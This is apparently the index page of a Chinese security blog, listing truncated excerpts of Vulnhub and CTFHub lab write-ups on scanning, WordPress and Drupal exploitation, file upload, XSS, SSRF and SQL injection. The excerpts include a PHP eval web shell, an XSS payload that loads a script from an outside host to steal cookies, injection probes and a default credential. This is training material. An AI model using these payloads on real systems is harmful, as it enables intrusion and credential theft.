Kyon-H Blog

「离开世界之前 一切都是过程」

DC-2

DC-2

主机发现 发现192.168.163.131,端口扫描 访问 80 端口,被重定向到 http://DC-2 ,修改 hosts 即可访问 目录扫描,发现 wp-admin 后台登陆路径 访问站点,获取到 flag1,按提示使用 cewl 1 2 3 4 5 6 7 cewl http://dc-2/wp-login.php -w pass.txt wpscan --url...

JIS-CTF

JIS-CTF

环境搭建 Vuluhub 靶场 IP 问题 - Kyon-H Blog 信息搜集 发现主机:192.168.163.133 1 nmap -T4 -A -p- 192.168.163.133 扫描站点发现robots.txt 渗透测试 访问 flag 目录获取到 flag1 访问 admin_area,获取到 flag2 和 admin 密码 登录成功,发现...

DC-1

DC-1

1. 信息搜集 1.1. 主机发现 1 2 3 4 arp-scan -l namp -T4 -A -p- 192.168.163.131 # 扫描端口 dirb http://192.168.163.131 # 扫描目录 whatweb -v 192.168.163.131 1.2. 渗透 1 2 3 4 5 6 7 msfconsole > search drupal &...

vulnhub靶场 XXE Lab 1

vulnhub XXE Lab 1

1. 信息搜集 nmap 探测主机 扫描端口 访问 80 端口 扫描目录 访问 robot.txt 访问 http://192.168.163.131/xxe/admin.php 2. 漏洞探测 bp 抓包发现支持 application/xml 构造 xml 数据 无效,继续扫描 xxe 目录 访问 http://192.168.1...

CTFHub Web 文件上传

CTFHub Web 文件上传

1. 文件上传 1.1. 无验证 构造一句话木马 shell.php 1 <?php echo 123;@eval($_POST['code']);?> 上传成功 蚁剑获取到 flag 文件 1.2. 前端验证 上传 shell.php.jpg bp 抓包修改后缀,上传成功,蚁剑连接 1.3. .htaccess 创建 .htaccess 文件...

CTFHub Web 密码口令

CTFHub Web 密码口令

1. 密码口令 1.1. 弱口令 bp 1.2. 默认口令 使用 admin 用户登录,显示用户不存在,尝试测试用户名,失败 浏览器搜索 eYou 默认账户名密码进行尝试 1 eyougw:admin@(eyou)

CTFHub Web 信息泄露

CTFHub Web 信息泄露

1. 信息泄露 1.1. 目录遍历 手动查找目录,找到 flag 1.2. PHPINFO 查看 phpinfo,搜索到 flag 1.3. 备份文件下载 1.3.1. 网站源码 bp 构造 payload,获取到 www.zip 文件,解压 文件中未找到,访问 flag_183531374.txt 获取到 flag 1.3.2. bak 文件 访问 inde...

CTFHub Web XSS

CTFHub Web XSS

1. XSS 1.1. 反射型 1 2 3 4 <script> alert(123); </script> #成功 注册 XSS 平台,填入 <sCRiPt sRC=//xs.pe/s2x></sCrIpT> 复制地址栏地址 sendURLtoBot 查看访问记录的 cookie 1.2. 存储型 1 2 <s...

CTFHub Web SSRF

CTFHub Web SSRF

1. SSRF 1.1. 内网访问 访问 [http://127.0.0.1/flag.php](http://127.0.0.1/flag.php) 1.2. 伪协议读取文件 http://127.0.0.1/flag.php 读取到???说明文件存在 php://filter/read=convert.base64-encode/resource=http://127.0....

CTFHub Web SQL 注入

CTFHub Web SQL 注入

1. SQL 注入 1.1. 整数型注入 1 2 3 4 1 #显示 1 and 1=1 #显示 -1 union select 1,2,3 #不显示 -1 union select 1,2 #显示 获取数据库和表 获取 flag 表字段 获取 flag 1.2. 字符型注入 1 2 3 # 字符型确认 ?id=1' and 1=1--+ ?id=1' and...